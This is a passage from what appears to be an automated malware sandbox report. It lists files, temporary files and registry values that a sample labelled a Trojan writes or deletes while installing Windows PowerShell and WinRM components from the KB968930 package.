%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%WinDir%\inf\oem11.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Trojan deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process PSCustomSetupUtil.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\SKPV06BH\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:1068 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\TNU05CIO\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\PHMSX28D\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7X38EKPU\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\OGLQW17C\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:3252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\917CINSY\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:3680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\NFKPV05B\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\MEKPV05B\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\PGLRW27D\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:1456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\JCHMSX27\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3972 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\9Z5AGLRW\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:4020 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1SY38DHM\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\POV17CIO\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\QGLRW27D\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0RX28DIO\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ULQW17CI\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\LCINTY49\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process mscorsvw.exe:2508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (171 bytes)

Registry activity

The process %original file name%.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 88 D8 6C 9E C7 96 20 F7 C6 50 42 AB B1 54 EA"

The process mofcomp.exe:2148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 A8 E1 DF AF 6A 45 A1 BA 3E D1 E4 5C B5 3A AF"

The process WindowsXP-KB968930-x86-ENG.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 AE E8 01 6F 62 EF 5F 3B E6 7F A2 58 8B 85 8D"

The process ngen.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 63 C6 9F 25 A9 78 A1 8D 5C 0B F9 99 32 A7 2F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process update.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.inf" = "1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

